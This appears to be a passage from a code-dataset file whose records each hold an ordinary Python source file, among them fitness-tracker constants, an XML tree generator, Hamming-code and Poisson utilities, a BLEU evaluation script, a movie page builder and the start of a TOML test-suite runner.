\"Running\"\nTYPE_HIKING_KEY = \"Hiking\"\nTYPE_WALKING_KEY = \"Walking\"\nTYPE_CYCLING_KEY = \"Cycling\"\nTYPE_MOUNTAIN_BIKING_KEY = \"Mountain Biking\"\nTYPE_OPEN_WATER_SWIMMING_KEY = \"Open Water Swimming\"\nTYPE_POOL_SWIMMING_KEY = \"Pool Swimming\"\nTYPE_PULL_UP_KEY = \"Pull Up\"\nTYPE_PUSH_UP_KEY = \"Push Up\"\nFOOT_BASED_ACTIVITIES = [ TYPE_RUNNING_KEY, TYPE_HIKING_KEY, TYPE_WALKING_KEY ]\nBIKE_BASED_ACTIVITIES = [ TYPE_CYCLING_KEY, TYPE_MOUNTAIN_BIKING_KEY ]\nSWIMMING_ACTIVITIES = [ TYPE_OPEN_WATER_SWIMMING_KEY, TYPE_POOL_SWIMMING_KEY ]\n\n# Activity names\nUNNAMED_ACTIVITY_TITLE = \"Unnamed\"\n\n# Interval workouts\nINTERVAL_REPEAT_KEY = \"Repeat\"\nINTERVAL_DISTANCE_KEY = \"Distance\"\nINTERVAL_PACE_KEY = \"Pace\"\nINTERVAL_RECOVERY_DISTANCE_KEY = \"Recovery Distance\"\nINTERVAL_RECOVERY_PACE_KEY = \"Recovery Pace\"\n\n# Goals\nGOAL_KEY = \"goal\"\nGOAL_DATE_KEY = \"goal_date\"\nGOAL_SWIM_DISTANCE_KEY = \"goal_swim_distance\"\nGOAL_BIKE_DISTANCE_KEY = \"goal_bike_distance\"\nGOAL_RUN_DISTANCE_KEY = \"goal_run_distance\"\nGOAL_FITNESS_KEY = \"Fitness\"\nGOAL_5K_RUN_KEY = \"5K Run\"\nGOAL_10K_RUN_KEY = \"10K Run\"\nGOAL_15K_RUN_KEY = \"15K Run\"\nGOAL_HALF_MARATHON_RUN_KEY = \"Half Marathon\"\nGOAL_MARATHON_RUN_KEY = \"Marathon\"\n\n# Used by the workout plan generator\nLONGEST_RUN_IN_FOUR_WEEKS_KEY = \"Longest Run In Four Weeks\"\nAGE_YEARS_KEY = \"Age In Years\"\nEXPERIENCE_LEVEL_KEY = \"Experience Level\"\nWEEKS_UNTIL_GOAL_KEY = \"Weeks Until Goal\"\n\n# Used to track deferred tasks\nDEFERRED_TASKS_USER_ID = \"user_id\"\nTASKS_KEY = \"tasks\"\nTASK_ID_KEY = \"task id\"\nTASK_TYPE_KEY = \"task type\"\nTASK_DETAILS_KEY = \"task details\"\nTASK_STATE_KEY = \"task state\"\nIMPORT_TASK_KEY = \"import\"\nANALYSIS_TASK_KEY = \"analysis\"\nWORKOUT_PLAN_TASK_KEY = \"workout plan\"\n\n# Things associated with deferred tasks\nLOCAL_FILE_NAME = \"local file name\"\n\nTIME_KEYS = [ BEST_1K, BEST_MILE, BEST_5K, BEST_10K, BEST_15K, BEST_HALF_MARATHON, BEST_MARATHON, BEST_METRIC_CENTURY, BEST_CENTURY ]\nDISTANCE_KEYS = [ TOTAL_DISTANCE, LONGEST_DISTANCE ]\nSPEED_KEYS = [ APP_CURRENT_SPEED_KEY, APP_AVG_SPEED_KEY, APP_MOVING_SPEED_KEY, APP_SPEED_VARIANCE_KEY, BEST_SPEED, APP_AVG_SPEED_KEY ]\nPACE_KEYS = [ APP_CURRENT_PACE_KEY, BEST_PACE, AVG_PACE, LONG_RUN_PACE, EASY_RUN_PACE, TEMPO_RUN_PACE, SPEED_RUN_PACE, INTERVAL_PACE_KEY ]\nPOWER_KEYS = [ AVG_POWER, MAX_POWER, BEST_5_SEC_POWER, BEST_12_MIN_POWER, BEST_20_MIN_POWER, BEST_1_HOUR_POWER, NORMALIZED_POWER, THRESHOLD_POWER ]\nHEART_RATE_KEYS = [ AVG_HEART_RATE, MAX_HEART_RATE ]\nCADENCE_KEYS = [ APP_CADENCE_KEY, AVG_CADENCE, MAX_CADENCE ]\nGOALS = [ GOAL_FITNESS_KEY, GOAL_5K_RUN_KEY, GOAL_10K_RUN_KEY, GOAL_15K_RUN_KEY, GOAL_HALF_MARATHON_RUN_KEY, GOAL_MARATHON_RUN_KEY ]\n\nUNSUMMARIZABLE_KEYS = [ APP_SPEED_VARIANCE_KEY, APP_DISTANCES_KEY, APP_LOCATIONS_KEY, ACTIVITY_TIME_KEY, ACTIVITY_TYPE_KEY, ACTIVITY_HASH_KEY, ACTIVITY_LOCATION_DESCRIPTION_KEY, ACTIVITY_INTERVALS, MILE_SPLITS, KM_SPLITS ]\n","sub_path":"Keys.py","file_name":"Keys.py","file_ext":"py","file_size_in_byte":11285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"302265000","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport sys\nimport fileinput\nimport os\nimport re\nfrom pathlib import Path\n\ndef get_args():\n if len( sys.argv ) != 5:\n raise IOError(\"Must get: 1. Control graph; 2. Configuration file; 3. Source PLPs folder; 4. Tree depth.\")\n\n #\n file_control_graph_input_path = sys.argv[1]\n print( \"argument: file_control_graph_input_path : \" + file_control_graph_input_path )\n\n\n file_configuration_input_path = sys.argv[2]\n print( \"argument: file_configuration_input_path : \" + file_configuration_input_path )\n\n plps_path = sys.argv[3]\n print( \"argument: file_source_plp_input_path : \" + plps_path )\n\n depth_number = int(sys.argv[4])\n\n if os.path.exists(file_control_graph_input_path):\n print( \"found: file_control_graph_input_path : \" + file_control_graph_input_path )\n file_control_graph_input = open( file_control_graph_input_path, 'r+' )\n else:\n raise ImportError( \"file_control_graph_input_path file does not exists: \" + file_control_graph_input_path )\n\n if os.path.exists(file_configuration_input_path):\n print( \"found: file_configuration_input_path : \" + file_configuration_input_path )\n file_configuration_input = open( file_configuration_input_path, 'r+' )\n else:\n raise ImportError( \"file_configuration_input_path file does not exists: \" + file_configuration_input_path )\n\n if os.path.exists(plps_path):\n print( \"found: plps_path : \" + plps_path )\n #file_source_plp_input = open( file_source_plps_input_path, 'rt' )\n else:\n raise ImportError( \"plps_path folder does not exists: \" + plps_path )\n\n ''' \n plp_name = re.search(\"(.*/)([^/]*)\\.xml\",\n file_source_plps_input_path, re.DOTALL)\n \n if ( None != plp_name ):\n plps_path = plp_name[1]\n plp_name = plp_name[2]\n print(\"plps_path: \" + plps_path)\n print(\"plp_name: \" + plp_name)\n '''\n\n return file_control_graph_input, file_configuration_input, plps_path, depth_number\n\ndef open_plp( plps_directory, plp_name):\n path_to_plp = os.path.join( plps_directory, plp_name )\n if os.path.exists(path_to_plp):\n print( \"open plp : \" + path_to_plp )\n plp_file = open( path_to_plp, 'rt' )\n else:\n raise ImportError( \"can not openplp: \" + path_to_plp )\n\n return plp_file\n\ndef create_probability_tree( depth, root_index, free_index, list_leafs_indexes, text ):\n if depth < 1:\n return [ free_index, text ]\n\n elif depth == 1:\n reserved_couple_indexes = free_index\n text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n ' \\n').format(index_father=root_index,index_son_left=reserved_couple_indexes,index_son_right=reserved_couple_indexes+1)\n list_leafs_indexes.append(reserved_couple_indexes)\n list_leafs_indexes.append(reserved_couple_indexes+1)\n return [ free_index+2, text ]\n\n elif depth >= 1:\n reserved_couple_indexes = free_index\n text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n ' \\n').format(index_father=root_index,index_son_left=reserved_couple_indexes,index_son_right=reserved_couple_indexes+1)\n\n free_index, text = create_probability_tree(depth - 1, reserved_couple_indexes, free_index + 2, list_leafs_indexes, text)\n free_index, text = create_probability_tree(depth - 1, reserved_couple_indexes + 1, free_index, list_leafs_indexes, text)\n\n return [ free_index, text ]\n\n\ndef main( single_node = True ):\n if sys.version_info[0] < 3: # Python 2 needs utf-8\n reload(sys)\n sys.setdefaultencoding('utf-8')\n\n file_control_graph_input, file_configuration_input, plps_path, depth_number = get_args()\n\n plps_to_delete = [\"achieve_false_0*.xml\", \"achieve_true_0*.xml\", \"maintain_0*.xml\", \"observe_0*.xml\"]\n for plp_to_delete in plps_to_delete:\n for file_path in Path(plps_path).glob(plp_to_delete):\n print(\"remove: \" + str(file_path))\n os.remove(file_path)\n\n plp_name_achieve_false = \"achieve_false_xml\"\n plp_name_achieve_true = \"achieve_true_xml\"\n plp_name_maintain = \"maintain_xml\"\n plp_name_observe = \"observe_xml\"\n plp_file_achieve_false = open_plp(plps_path, plp_name_achieve_false)\n plp_file_achieve_true = open_plp(plps_path, plp_name_achieve_true)\n plp_file_maintain = open_plp(plps_path, plp_name_maintain)\n plp_file_observe = open_plp(plps_path, plp_name_observe)\n plp_text_achieve_false = plp_file_achieve_false.read()\n plp_text_achieve_true = plp_file_achieve_true.read()\n plp_text_maintain = plp_file_maintain.read()\n plp_text_observe = plp_file_observe.read()\n\n control_graph_input_text = file_control_graph_input.read()\n\n sub_flags = re.MULTILINE | re.DOTALL\n\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n\n control_graph_input_text = re.sub(r']*\"/>', '', control_graph_input_text )\n\n text_for_configuration_variables = \"\"\n text_for_configuration_parameters = \"\"\n\n control_graph_text = \"\"\n nodes_counter = 0\n list_leafs_indexes = []\n nodes_counter, control_graph_text = create_probability_tree( depth_number, nodes_counter, nodes_counter + 1, list_leafs_indexes, control_graph_text)\n\n\n for root_index in list_leafs_indexes:\n node_maintain_index = nodes_counter\n plp_maintain_index = nodes_counter + 1\n node_sequential_observe = nodes_counter + 2\n plp_observe_index = nodes_counter + 3\n node_condition_index = nodes_counter + 4\n node_sequential_achieve_true_index = nodes_counter + 5\n node_sequential_achieve_false_index = nodes_counter + 6\n plp_achieve_true_index = nodes_counter + 7\n plp_achieve_false_index = nodes_counter + 8\n\n control_graph_text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n ' \\n'\n '\\n'\n '\\t \\n'\n ' \\n'\n '\\n'\n '\\t \\n'\n ' \\n'\n '\\n'\n '\\t\\n'\n '\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\t\\t \\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t \\n'\n '\\t\\t\\t \\n'\n '\\t\\t \\n'\n '\\t \\n'\n '\\t\\n'\n '\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\t\\t \\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t \\n'\n '\\t\\t\\t \\n'\n '\\t\\t \\n'\n '\\t \\n'\n ' \\n'\n '\\n'\n '\\t \\n'\n ' \\n'\n '\\n'\n '\\t \\n'\n ' ').format(node_concurrent_index=root_index,\n node_maintain_index = node_maintain_index,\n plp_maintain_index = plp_maintain_index,\n node_sequential_observe = node_sequential_observe,\n plp_observe_index = plp_observe_index,\n node_condition_index = node_condition_index,\n node_sequential_achieve_true_index = node_sequential_achieve_true_index,\n node_sequential_achieve_false_index = node_sequential_achieve_false_index,\n plp_achieve_true_index = plp_achieve_true_index,\n plp_achieve_false_index = plp_achieve_false_index)\n\n path_plp_observe = os.path.join( plps_path, \"observe_{plp_observe_index:08d}.xml\".format(plp_observe_index = plp_observe_index) )\n file_plp_observe = open(path_plp_observe, 'wt')\n current_plp_text_observe = plp_text_observe\n current_plp_text_observe = re.sub(r'\"observe_\"', '\"observe_{plp_observe_index:08d}\"'.format(plp_observe_index = plp_observe_index), current_plp_text_observe)\n current_plp_text_observe = re.sub(r'\"observe_goal_\"', '\"observe_goal_{plp_observe_index:08d}\"'.format(plp_observe_index = plp_observe_index), current_plp_text_observe)\n\n file_plp_observe.write( current_plp_text_observe )\n file_plp_observe.close()\n\n text_for_configuration_parameters += ' \\n'.format(plp_observe_index = plp_observe_index)\n\n\n path_plp_maintain = os.path.join(plps_path, \"maintain_{plp_maintain_index:08d}.xml\".format(plp_maintain_index=plp_maintain_index))\n file_plp_maintain = open(path_plp_maintain, 'wt')\n current_plp_text_maintain = plp_text_maintain\n current_plp_text_maintain = re.sub(r'\"maintain_\"', '\"maintain_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintaining_\"', '\"maintaining_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintain_termination_success_\"', '\"maintain_termination_success_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintain_termination_failure_\"', '\"maintain_termination_failure_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n\n text_for_configuration_variables += (' \\n'\n ' \\n'\n ' \\n').format(plp_maintain_index=plp_maintain_index)\n\n file_plp_maintain.write(current_plp_text_maintain)\n file_plp_maintain.close()\n\n path_plp_achieve_true = os.path.join(plps_path, \"achieve_true_{plp_achieve_true_index:08d}.xml\".format(\n plp_achieve_true_index=plp_achieve_true_index))\n file_plp_achieve_true = open(path_plp_achieve_true, 'wt')\n current_plp_text_achieve_true = plp_text_achieve_true\n current_plp_text_achieve_true = re.sub(r'\"achieve_true_\"',\n '\"achieve_true_{plp_achieve_true_index:08d}\"'.format(\n plp_achieve_true_index=plp_achieve_true_index),\n current_plp_text_achieve_true)\n\n current_plp_text_achieve_true = re.sub(r'\"maintain_\"',\n '\"maintain_{plp_maintain_index:08d}\"'.format(\n plp_maintain_index=plp_maintain_index),\n current_plp_text_achieve_true)\n\n\n file_plp_achieve_true.write(current_plp_text_achieve_true)\n file_plp_achieve_true.close()\n\n\n path_plp_achieve_false = os.path.join(plps_path, \"achieve_false_{plp_achieve_false_index:08d}.xml\".format(\n plp_achieve_false_index=plp_achieve_false_index))\n file_plp_achieve_false = open(path_plp_achieve_false, 'wt')\n current_plp_text_achieve_false = plp_text_achieve_false\n current_plp_text_achieve_false = re.sub(r'\"achieve_false_\"',\n '\"achieve_false_{plp_achieve_false_index:08d}\"'.format(\n plp_achieve_false_index=plp_achieve_false_index),\n current_plp_text_achieve_false)\n\n current_plp_text_achieve_false = re.sub(r'\"maintain_\"',\n '\"maintain_{plp_maintain_index:08d}\"'.format(\n plp_maintain_index=plp_maintain_index),\n current_plp_text_achieve_false)\n\n file_plp_achieve_false.write(current_plp_text_achieve_false)\n file_plp_achieve_false.close()\n\n nodes_counter += 9\n\n configuration_input_text = file_configuration_input.read()\n configuration_input_text = re.sub(r\"]*>[ \\n\\r]*\", \"\", configuration_input_text, flags=sub_flags)\n configuration_input_text = re.sub(r\"]*>[ \\n\\r]*\", \"\", configuration_input_text, flags=sub_flags)\n\n\n text_for_configuration_variables += (' \\n'\n ' \\n' )\n # ' \\n'\n # ' \\n'\n # ' \\n')\n\n #text_for_configuration_parameters += (' \\n')\n\n configuration_input_text = configuration_input_text.replace( \"\", text_for_configuration_variables + text_for_configuration_parameters + \"\" )\n\n file_configuration_input.truncate(0) # .*\n file_configuration_input.seek(0)\n file_configuration_input.write(configuration_input_text)\n\n\n control_graph_input_text = control_graph_input_text.replace( \"\", control_graph_text + \"\" )\n\n file_control_graph_input.truncate(0) # .*\n file_control_graph_input.seek(0)\n file_control_graph_input.write(control_graph_input_text)\n\n\n plp_file_achieve_false.close()\n plp_file_achieve_true.close()\n plp_file_maintain.close()\n plp_file_observe.close()\n file_configuration_input.close()\n file_control_graph_input.close()\n print(\"Done\")\n \n \nmain(True)\n\n# Run example:\n# ./create_tree.py control_graph.xml configurations.xml plps/ 10\n","sub_path":"Examples/example_comprehensive_test/create_tree.py","file_name":"create_tree.py","file_ext":"py","file_size_in_byte":17612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"247561726","text":"v1 = [0,0,1,0,1,0,1]\nv2 = [1,1,0,0,1,0]\n\ndef Hamming_Distance():\n hd = 0\n if len(v1) != len(v2):\n print('These vectors are not the same length.')\n else:\n for i in range(len(v1)):\n if v1[i] != v2[i]:\n hd+=1\n \n print('The Hamming Distance is',hd)\n \n\ndef decimalToVector(i,l):\n number = bin(i)[2:]\n if l < len(number):\n print('The number of chosen bits is too little for this number.')\n else:\n vector = []\n if len(number) < l:\n d = l - len(bin(i)[2:])\n for i in range(d):\n vector.append('0')\n for i in range(len(vector)):\n vector[i] = int(vector[i])\n for i in range(len(number)):\n vector.append(int(number[i]))\n return(vector)\n\ndef vectorToDecimal(v):\n lst_v = []\n for items in v:\n lst_v.append(str(items))\n decimal = int((''.join(lst_v)),2)\n print('The decimal of this vector is',decimal)\n\n\nv = [1,1,1,0]\nG = [[1,1,1,0,0,0,0],[1,0,0,1,1,0,0],[0,1,0,1,0,1,0],[1,1,0,1,0,0,1]]\n\ndef vectorTimesMatrix(v,G):\n i = 0 \n m = 0 \n count = 0\n times = 0\n calc_vector = []\n if len(v) != len(G):\n print('Error: dimensions do not match')\n else:\n while i <= len(v):\n times += G[i][m] * v[i]\n i+=1\n if i == len(v):\n m+=1\n i=0\n count+=1\n if str(times) not in '0' and str(times) not in '1':\n times = int(bin(times)[-1])\n calc_vector.append(times)\n times = 0\n if count == len(G[0]):\n break\n print(calc_vector)\n\ndef MatrixGridPrint(G):\n for vector in G:\n row = []\n for digit in vector:\n row.append(str(digit))\n print(''.join(row))\n \n \n#function HammingG\n#input: a number r\n#output: G, the generator matrix of the (2^r-1,2^r-r-1) Hamming code\ndef hammingGeneratorMatrix(r):\n n = 2**r-1\n \n #construct permutation pi\n pi = []\n for i in range(r):\n pi.append(2**(r-i-1))\n for j in range(1,r):\n for k in range(2**j+1,2**(j+1)):\n pi.append(k)\n\n #construct rho = pi^(-1)\n rho = []\n for i in range(n):\n rho.append(pi.index(i+1))\n\n #construct H'\n global H\n H = []\n for i in range(r,n):\n H.append(decimalToVector(pi[i],r))\n\n #construct G'\n GG = [list(i) for i in zip(*H)]\n for i in range(n-r):\n GG.append(decimalToVector(2**(n-r-i-1),n-r))\n\n #apply rho to get Gtranpose\n G = []\n for i in range(n):\n G.append(GG[rho[i]])\n\n #transpose \n G = [list(i) for i in zip(*G)]\n MatrixGridPrint(G)\n \n\nm = [1,0,0,0] \ndef HammingEncoder():\n vectorTimesMatrix(m,G)\n\ndef HammingTranspose():\n HTranspose =[list(i) for i in zip(*G)]\n MatrixGridPrint(HTranspose)\n\n\n\n \n \n \n\n","sub_path":"Eddies-Code/Python/Summative/ErroCorrecting/ErrorCorrectingV1.1.py","file_name":"ErrorCorrectingV1.1.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"477094492","text":"#10-14-21 KYGM\n#App that returns poisson probability distribution table\n#complete\n\nimport math\n\ncont = 1\n \n# Returns factorial of n\ndef fact(n):\n \n res = 1\n \n for i in range(2, n+1):\n res = res * i\n \n return res\n\n#Returns PPD\ndef ppd(lbd,t,x):\n ppd = (((lbd*t)**x)/(fact(x)))*math.exp((-lbd)*t)\n return ppd\n\n#input constants\nlbd = input(\"Enter Lambda: \")\nt = input(\"Enter t: \")\nli = input(\"Enter list size: \")\n\n#casting\nlbd = float(lbd)\nt = int(t)\nli = int(li)\n\nwhile cont == 1:\n \n for i in range(li + 1):\n doge = ppd(lbd,t,i)\n print(i, \": \", doge)\n \n \n cont = input(\"Enter 1 for another or 0 to end: \")\n cont = int(cont)\n \n \n\n\n","sub_path":"PPDTable.py","file_name":"PPDTable.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"492637329","text":"###############################################################################\n# Author: Wasi Ahmad\n# Project: Neural Session Relevance Framework\n# Date Created: 7/29/2017\n#\n# File Description: This script evaluates test ranking performance.\n###############################################################################\n\nimport os, util, helper, data, multi_bleu, torch\nfrom torch.autograd import Variable\nfrom data import Session\nfrom model import NSRF\n\nargs = util.get_args()\n\n\ndef suggest_next_query(model, session_queries, session_query_length, dictionary):\n # query encoding\n embedded_queries = model.embedding(session_queries.view(-1, session_queries.size(-1)))\n encoded_queries = model.query_encoder(embedded_queries, session_query_length.view(-1).data.cpu().numpy())\n encoded_queries = model.apply_pooling(encoded_queries, model.config.pool_type)\n # encoded_queries: batch_size x session_length x (nhid_query * self.num_directions)\n encoded_queries = encoded_queries.view(*session_queries.size()[:-1], -1)\n\n # session level encoding\n sess_q_hidden = model.session_query_encoder.init_weights(encoded_queries.size(0))\n hidden_states, cell_states = [], []\n # loop over all the queries in a session\n for idx in range(encoded_queries.size(1)):\n # update session-level query encoder state using query representations\n sess_q_out, sess_q_hidden = model.session_query_encoder(encoded_queries[:, idx, :].unsqueeze(1), sess_q_hidden)\n # -1: only consider hidden states of the last layer\n if model.config.model == 'LSTM':\n hidden_states.append(sess_q_hidden[0][-1])\n cell_states.append(sess_q_hidden[1][-1])\n else:\n hidden_states.append(sess_q_hidden[0][-1])\n\n hidden_states = torch.stack(hidden_states, 1)\n hidden_states = hidden_states[:, -1, :].contiguous().view(-1, hidden_states.size(-1)).unsqueeze(0)\n if model.config.model == 'LSTM':\n cell_states = torch.stack(cell_states, 1)\n cell_states = cell_states[:, -1, :].contiguous().view(-1, cell_states.size(-1)).unsqueeze(0)\n decoder_hidden = (hidden_states, cell_states)\n else:\n decoder_hidden = hidden_states\n\n sos_token_index = dictionary.word2idx['']\n eos_token_index = dictionary.word2idx['']\n\n # First input of the decoder is the sentence start token\n decoder_input = Variable(torch.LongTensor([sos_token_index]))\n decoded_words = []\n for di in range(model.config.max_query_length + 1):\n if model.config.cuda:\n decoder_input = decoder_input.cuda()\n embedded_decoder_input = model.embedding(decoder_input).unsqueeze(1)\n decoder_output, decoder_hidden = model.decoder(embedded_decoder_input, decoder_hidden)\n topv, topi = decoder_output.data.topk(1)\n ni = topi[0][0]\n if ni == eos_token_index:\n break\n else:\n decoded_words.append(dictionary.idx2word[ni])\n decoder_input = Variable(torch.LongTensor([ni]))\n\n return \" \".join(decoded_words)\n\n\ndef evaluate(model, dictionary, session_queries):\n session = Session()\n session.queries = session_queries\n session_queries, session_query_length, rel_docs, rel_docs_length, doc_labels = helper.session_to_tensor(\n [session], dictionary, iseval=True)\n if model.config.cuda:\n session_queries = session_queries.cuda()\n session_query_length = session_query_length.cuda()\n return suggest_next_query(model, session_queries, session_query_length, dictionary)\n\n\nif __name__ == \"__main__\":\n dictionary = helper.load_object(args.save_path + 'dictionary.p')\n embeddings_index = helper.load_word_embeddings(args.word_vectors_directory, args.word_vectors_file,\n dictionary.word2idx)\n model = NSRF(dictionary, embeddings_index, args)\n if args.cuda:\n model = model.cuda()\n helper.load_model_states_from_checkpoint(model, os.path.join(args.save_path, 'model_best.pth.tar'), 'state_dict',\n args.cuda)\n print('model, embedding index and dictionary loaded.')\n model.eval()\n\n test_corpus = data.Corpus(args.tokenize, args.max_query_length, args.max_doc_length)\n test_corpus.parse(args.data + 'test.txt', args.max_example)\n print('test set size = ', len(test_corpus))\n\n targets, candidates = [], []\n fw = open(args.save_path + 'predictions_mmt.txt', 'w')\n for sess_len, sessions in test_corpus.data.items():\n for sess in sessions:\n for i in range(len(sess) - 1):\n target = evaluate(model, dictionary, sess.queries[:i + 1])\n candidate = \" \".join(sess.queries[i + 1].query_terms[1:-1])\n targets.append(target)\n candidates.append(candidate)\n inp = []\n for query in sess.queries[:i + 1]:\n inp.append(' '.join(query.query_terms[1:-1]))\n fw.write(', '.join(inp) + ' <:::> ' + candidate + ' <:::> ' + target + '\\n')\n fw.close()\n\n print(\"target size = \", len(targets))\n print(\"candidate size = \", len(candidates))\n multi_bleu.print_multi_bleu(targets, candidates)\n","sub_path":"multi_task_models/MNSRF/test_bleu.py","file_name":"test_bleu.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"421608697","text":"import media\nimport fresh_tomatoes\n\ntoy_story = media.Movie(\"Toy Story\",\n \"A story of a boy and his toys that come to life\",\n \"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\",\n \"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\n\navatar = media.Movie(\"Avatar\",\n \"A paraplegic marine dispatched to the moon Pandora on a unique mission becomes torn between following his orders and protecting the world he feels is his home.\",\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMTYwOTEwNjAzMl5BMl5BanBnXkFtZTcwODc5MTUwMw@@._V1_.jpg\",\n \"https://www.youtube.com/watch?v=d1_JBMrrYw8\")\n\namericanPsycho = media.Movie(\"American Psycho\",\n \"Patric Bateman 2 years old who believes in taking care of himself\",\n \"https://upload.wikimedia.org/wikipedia/en/6/63/Americanpsychoposter.jpg\",\n \"https://www.youtube.com/watch?v=RjKNbfA64EE\")\n\n'''\nTester Code:\nprint(toy_story.storyline)\navatar.show_trailer()\n'''\n\nmovies = [toy_story, avatar, americanPsycho]\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"107339311","text":"#!/usr/bin/env python\n\"\"\"TOML compliance suite runner.\n\"\"\"\n\nimport argparse\nimport difflib\nimport json\nimport multiprocessing\nimport os\nimport subprocess\nimport sys\nimport textwrap\nfrom pathlib import Path\n\n\nclass Failed(Exception):\n \"\"\"Raised when a check fails for some reason\n\n :param reason:\n Textual reason, explaining why the test failed.\n :param cause:\n Exception, representing the reason for failure.\n :param diff:\n A tuple of 2 JSON-able objects, that should be presented as a diff.\n \"\"\"\n\n def __init__(self, reason, *, cause=None, diff=None):\n self.reason = reason\n\n if cause is not None:\n self.details = repr(cause)\n elif diff is not None:\n correct, got = diff\n correct_str = json.dumps(correct, indent=2, sort_keys=True)\n got_str = json.dumps(got, indent=2, sort_keys=True)\n\n diff_lines = difflib.ndiff(\n correct_str.splitlines(keepends=False),\n got_str.splitlines(keepends=False),\n )\n self.details = \"\\n\".join(diff_lines)\n else:\n self.details = None\n\n super().__init__(reason, self.details)\n\n\nclass JSONValidationError(Exception):\n \"\"\"Raised when the JSON data does not have valid types or values for the type.\n \"\"\"\n\n def __repr__(self):\n return str(self)\n\n\n# --------------------------------------------------------------------------------------\n# Colors\n# --------------------------------------------------------------------------------------\n_COLOR_ALLOWED = sys.stdout.isatty()\n# Handle optional Windows-ANSI support dependency (colorama)\nif _COLOR_ALLOWED and os.name == \"nt\":\n try:\n import colorama\n except ImportError:\n print(\n \"TIP: If you install https://pypi.org/project/colorama, this program \"\n \"will look much better.\"\n )\n _COLOR_ALLOWED = False\n else:\n colorama.init()\n\n_COLOR_NAMES = [\"grey\", \"red\", \"green\", \"yellow\", \"blue\", \"magenta\", \"cyan\", \"white\"]\n_COLOR_DICT = dict(zip(_COLOR_NAMES, range(8)))\n\n\ndef colored(s, *, fg=None, bg=None, bold=False):\n assert fg is not None or bg is not None\n if not _COLOR_ALLOWED:\n return s\n\n ansi_codes = []\n if bold:\n ansi_codes.append(1)\n if fg is not None:\n ansi_codes.append(_COLOR_DICT[fg] + 30)\n if bg is not None:\n ansi_codes.append(_COLOR_DICT[bg] + 40)\n\n parameters = \";\".join(map(str, ansi_codes))\n\n return f\"\\033[{parameters}m{s}\\033[0m\"\n\n\n# --------------------------------------------------------------------------------------\n# Filesystem interaction\n# --------------------------------------------------------------------------------------\nhere = Path(__file__).parent\n\n\ndef ensure_executable(path):\n if not os.path.isfile(path):\n raise FileNotFoundError(f\"Could not find file: {path}\")\n if not os.access(path, os.X_OK):\n raise PermissionError(f\"Not an executable file: {path}\")\n\n\ndef _locate_test_pairs():\n for path in sorted((here / \"invalid\").glob(\"*/*.toml\")):\n yield path, None\n for path in sorted((here / \"invalid\").glob(\"*/*.json\")):\n yield None, path\n\n for path in sorted((here / \"valid\").glob(\"*/*.toml\")):\n json_equivalent = path.with_suffix(\".json\")\n assert json_equivalent.exists(), f\"Missing: {json_equivalent}\"\n yield path, json_equivalent\n\n\ndef _filter_based_on_markers(pairs, markers):\n def marker_filter(pair):\n # No filtering if no markers given.\n if not markers:\n return True\n\n for m in markers:\n # Matches the name of the file (allows -m basic)\n if m in pair[0].stem:\n return True\n # Matches the name of the parent folder (allows -m array)\n if m == pair[0].parent.name:\n return True\n # Matches the name of the grandparent folder (allows -m invalid)\n if m == pair[0].parent.parent.name:\n return True\n return False\n\n yield from filter(marker_filter, pairs)\n\n\ndef get_test_pairs(markers):\n pairs = _locate_test_pairs()\n yield from _filter_based_on_markers(pairs, markers)\n\n\n# --------------------------------------------------------------------------------------\n# Input / Output Handling\n# --------------------------------------------------------------------------------------\ndef run_program(program, *, stdin, clean_exit):\n try:\n process = subprocess.run(\n [program], input=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n except OSError as error:\n raise Failed(f\"could not run: {program}\", cause=error)\n\n # For invalid Test Cases\n if clean_exit:\n if process.returncode:\n raise Failed(f\"Got a non-zero exit code: {process.returncode}\")\n if process.stderr:\n raise Failed(f\"Got stderr output!\", cause=process.stderr)\n else:\n if not process.returncode:\n raise Failed(\"Should have rejected input.\")\n\n return process.stdout\n\n\ndef validate_json(obj):\n # raise JSONValidationError(\"This is what the error looks like!\\nlol\")\n pass\n\n\ndef load_json(*, content, source):\n assert source in [\"decoder's output\", \"test case input\"]\n try:\n loaded = json.loads(content)\n except json.JSONDecodeError as error:\n raise Failed(f\"Could not parse {source} JSON\", 